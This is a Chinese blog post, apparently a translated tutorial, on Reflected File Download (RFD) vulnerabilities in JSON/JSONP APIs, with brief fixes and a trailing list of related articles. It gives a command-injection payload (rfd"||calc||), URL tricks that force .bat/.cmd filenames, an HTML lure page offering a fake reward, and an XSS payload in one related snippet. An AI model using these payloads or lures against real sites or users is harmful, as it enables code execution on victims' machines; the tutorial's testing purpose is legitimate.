怎么引用json文件里面的其中一部分_什么是反射型文件下载(RFD)漏洞,如何找到漏洞?

最新推荐文章于 2022-08-12 16:07:26 发布
最新推荐文章于 2022-08-12 16:07:26 发布
阅读量267 收藏
点赞数
文章标签: 怎么引用json文件里面的其中一部分

d784f92675d11c31449d24d6648beb94.png

什么是反射型文件下载(RFD)漏洞,如何找到漏洞?

翻译文章,原文: Reflected File Download(RFD) Vulnerability

什么是Reflected File Download(RFD)漏洞?

反射型文件下载漏洞(RFD)是一种攻击技术,通过从受信任的域(例如http://Google.com和http://Bing.com)虚拟下载文件,攻击者可以获得对受害者计算机的完全访问权限。Trustwave SpiderLabs安全研究员Oren Hafif于2014年发现了这种网络攻击技术。

72b077427a3b1a7b8e8b40223d43887f.png

检查什么地方?

JSONJSONP API是RFD的主要检查点,大多数现代Web应用程序都在使用此技术。借助Burp Suite或OWASP zap等工具,您可以找到要测试的候选对象。

例如:

https://some.website.com/api/v1.0/get_user_profile

怎么测试?

RFD测试可以分三个部分:反射, 文件名称下载

1. 反射

步骤1 :

验证JSON/JSONP API的响应,并检查是否得到了任何用户输入。

例如请求:

https://some.website.com/api/v1.0/get_user_profile

返回:

{
“data”: {
        “id”: “1239985”,
        “domain”: “website.com”,
        “ph”: “6456787984”,
        “first_name”: “DemoTest”,
        “last_name”: “LastRFD”,
        “version”: “5”,
        }
}

在示例中,您可以看到first_name,last_name和ph反射在JSON响应中。

步骤2:

现在,输入RFD有效负载 rfd"||calc|| 进入first_name和last_name字段。验证JSON / JSONP响应(如果它像 rfd"||calc|| 一样反射回来)那么就有RFD的可能性。

要完全验证它,请将响应复制并保存为filename.bat。使用cmd提示打开它,可以看到窗口calc弹出了。

例如返回:

{
“data”: {
        “id”: “1239985”,
        “domain”: “website.com”,
        “ph”: “6456787984”,
        “first_name”: “rfd”||calc||”,
        “last_name”: “rfd”||calc||”,
        “version”: “5”,
        }
}

因此,反射得到确认。我们需要利用它

2. 文件名称

具有挑战性的部分。如果我们在IE 11中命中JSON / JSONP API URL,我们可以看到响应将以somefileName.json的形式下载。文件名主要取决于http Content-Disposition标头和URL

要利用此漏洞,我们应该能够将文件格式更改为.cmd,.bat或.exe才能执行。怎么样实现呢?

例如:Content-Disposition: userprofile.json

文件将以Content-Disposition标头中提到的相同名称下载。因此,我们无法利用它。我们需要转到下一个可能性,例如没有Content-Disposition标头的响应。

如果Content-Disposition响应标头中没有返回文件名属性,浏览器将被迫根据URL确定下载文件的名称。

例如:https://some.website.com/api/v1.0/get_user_profile

get_user_profile.json

我们可以使用以下有效负载来绕过此文件名:

get_user_profile.bat

get_user_profile;setup.bat

get_user_profile/setup.bat

get_user_profile;/setup.bat

get_user_profile;/setup.bat;

3. 下载

HTML 模板:

<! DOCTYPE html>
<html>
<body>
<p>Click the Image and open the file: You will be rewarded with $800<p><a href=”https://some.website.com/api/v1.0/get_user_profile/setup.cmd?" download><img border=”0" src=”https://some.website.com/api/v1.0/get_user_profile/setup.cmd?" alt=”8000 Dollars” width=”104" height=”142"></a>
</body>
</html>

打开html页面,单击链接,文件将下载为setup.cmd。

bebd0c0426427780402be6bcb3148572.png

如何修复这个漏洞?

  • 使用 “ Content-Disposition ”标题强制文件名。
  • 使用CSRF令牌
  • 为所有API实施安全标头

引用:

https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/
weixin_39820185
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
接收到的json数据实现文件下载并修复下载csv文件中文乱码
yunlala_的博客
07-15 880
接收到的json数据实现文件下载并修复下载csv文件中文乱码 1. 首先json转csv格式:设置表头,通过\t换单元格,通过\r\n换行 2.填入数据(同理通过\t换单元格,通过\r\n换行) 3.1和2步骤处理好的数据(如变量csv): // \ufeff解决中文乱码问题 let csv = `\ufeff${getCSV(dataOb)}` // 解决中文乱码问题...
Spring Framework反射文件下载漏洞
05-08
在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和更旧的不受支持版本中,可能会绕过CVE-2015-5211对RFD攻击的保护,具体取决于通过使用jsessionid路径参数使用的浏览器。
Spring MVC的RFD-反射文件下载(cve-2020-5398)
Li-D的博客
09-16 1518
漏洞描述 Spring MVC的RFD反射文件下载漏洞)为攻击客户端的漏洞,当响应中设置了“Content-Disposition”头且filename属性是用户可控时容易受到RFD攻击。 攻击应满足以下所有条件才可成功: 1、响应header是通过org.springframework.http.ContentDisposition进行添加的; 2、文件名是通过以下方式之一设置的: ContentDisposition.Builder#filename(String) ContentDispositi
Spring框架反射文件下载漏洞 CVE-2020-5421
WgRui的博客
12-16 4693
Spring升级
Mlecms 反射xss && 后台任意文件下载
aixuan9365的博客
06-06 438
应该算0day吧,自己分析出来的,有点鸡肋,不过小cms分析确实比较简单。 xss地址:search.php?word=a><img+src=1+onerror=alert`1`>a&type=1 对于word的参数,他的过滤是这样的 $trim_str = ' .,;[]|+-=_`~!@#$%^&*()<>?{}...
「安全」SPRING FRAMEWORK反射文件下载漏洞
qq_18535553的博客
07-09 1597
「安全」SPRING FRAMEWORK反射文件下载漏洞 前言: 21年5月我在发布了自己的博客在服务器上后,仅一天就收到了腾讯云发的安全报警:“spring框架反射文件下载漏洞”并且在一天之内被异地异常登录攻击了11次(要知道我的域名审批没有下来,要访问我的博客只能通过公网的ip地址)因此,在收到异常报告后我就开始搜索相关信息,并且找到了一年前发布的安全公告。 综述: 20年9月,VMware Tanzu发布安全公告,公布了一个存在于Spring Framewo...
CVE-2020-5398:VE CVE-2020-5398-Spring MVC的RFD反射文件下载)攻击
04-15
在Spring Framework(版本低于5.2.3的5.2.x,版本5.1.13的5.1.x和版本5.0.16的5.0.x)中,应用程序在受到攻击时很容易受到反射文件下载RFD)攻击在响应中设置“ Content-Disposition”标头,其中filename属性是从...
RC522_RC522原理图和PCB_RC522图_RC522PCB文件_RC522PCB_pcb_
09-29
RC522原理图和PCB,按照这个打样可用。
RFD.rar_rfd
09-21
无线传感网络结点数据采集,应用CC2420和Atmel的Atmega128L进行开发,环境为ICCAVR
rfd:生锈的文件对话框
03-20
为什么要RFD? 它在所有平台上均使用100%本机API,不会在后台生成任何进程。 它支持异步/等待语法 如果有一天您决定将程序移植到浏览器,WASM支持将为您服务! 例子 // Sync Dialog let files = FileDialog :: new ...
如何做个bat文件改变系统时间格式_反射文件下载漏洞总结
weixin_39913472的博客
12-15 339
什么是反射文件下载漏洞反射文件下载漏洞(reflected file download,RFD)是一个来自2014年BlackHat(黑帽技术大会,成立于1997年)的漏洞,通过从受信任的域(如Google.com和Bing.com)虚拟下载文件,攻击者可以获得对受害者计算机的访问权限。漏洞原理假设我们有一个易受攻击的API(applicationprogramming interf...
关于Spring Framework反射文件下载漏洞风险 和 解决
天弃的博客
04-20 2836
VMware Tanzu发布安全公告,在Spring Framework版本5.2.0-5.2.8、 5.1.0-5.1.17、 5.0.0-5.0.18、 4.3.0-4.3.28和较旧的不受支持的版本中,公布了一个存在于Spring Framework中的反射文件下载(Reflected File Download,RFD漏洞CVE-2020-5421。 CVE-2020-5421 可通过jsessionid路径参数,绕过防御RFD攻击的保护。先前针对RFD的防护是为应对 CVE-2015-52..
一个很有意思的姿势——RFD
CC's Blog
11-18 2332
RFD = Reflected File Download 这是BlackHat2014的一个演讲,PPT:https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf 作者介绍RFD的文章:https://www.trustwave.c
【Spring框架RFD漏洞 (CVE-2020-5421) 解决方案】
weixin_42864006的博客
08-12 3802
Spring框架RFD漏洞 (CVE-2020-5421) 解决方案
Spring Framework 反射文件下载漏洞(CVE-2020-5421)复现
锋刃科技的博客
12-30 4262
漏洞概述 Spring是一个Java/Java EE/.NET的分层应用程序框架。 Spring Framework 存在反射文件下载漏洞 。 此漏洞由于Spring Framework并没有对filename传入的文件名进行严格的安全检测,攻击者可以通过截断的方式控制filename变量值,下载任意格式的文件。 影响版本 Spring Framework 5.2.0 – 5.2.2 Spring Framework 5.1.0 – 5.1.12 Spring Framework ..
浅谈 React 中的 XSS 攻击
前端劝退师
09-29 3000
前言前端一般会面临 XSS 这样的安全风险,但随着 React 等现代前端框架的流行,使我们在平时开发时不用太关注安全问题。以 React 为例,React 从设计层面上就具备了很好的防...
初探RFD-RFD的攻击原理和应对措施
卷福。的博客
04-22 1916
RFD全称Reflection file download,反射文件下载,一种json攻击手段。通过在URL中插入带有可执行文件的内容,一旦被点击这些可执行文件就会被下载并执行,攻击者通过控制文件的内容来达到自身攻击的目的。通过这个文件攻击者可以控制用户的计算机,可以控制浏览器设置包括那些加密的会话,还可以利用已下载的软件的漏洞。攻击者通常使用一些热门的受信任的域名来掩饰这个URL,让用户任务这是个安全的连接可以点击,以此让用户认为所有的操作都是安全的,从而使得攻击能够顺利进行。 RFD攻击想要能够进行有
json数据循环取部分数据
freeshu的博客
01-17 1253
需求是取data0、data1以及等等,之后也许还会有data7、8、9,因此如果用for in 取数据会全部取出来,而不是只有data0~4,因此可以用data[“key值名+变量”]的形式 for(var j=0;j<data.count;j++){ console.log(data[“data”+j+""]); } ...
CVE-2020-5398:Spring MVC_RFD
Fly_鹏程万里
04-17 5362
很久没有更新博文了,谢谢大家一直以来的支持,后续有时间会继续分享相关的技术知识,也希望大家一起参与技术讨论与交流~ 影响范围 Spring Framework 5.2.0 - 5.2.2 Spring Framework 5.1.0 - 5.1.12 Spring Framework 5.0.0 - 5.0.15 漏洞 反射文件下载漏洞(RFD) 利用条件 1、响应header...
..\hal\hal_rfd.c(42): error: #114: function hal_RFDDecodeFlt_Handle was referenced but not defined
最新发布
05-30
这是一个编译错误,提示在文件`hal_rfd.c`的第42行调用了函数`hal_RFDDecodeFlt_Handle`但是该函数没有被定义。这可能是由于头文件引用不正确或者函数实现文件没有正确编译导致的。你需要检查一下头文件及其路径是否...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值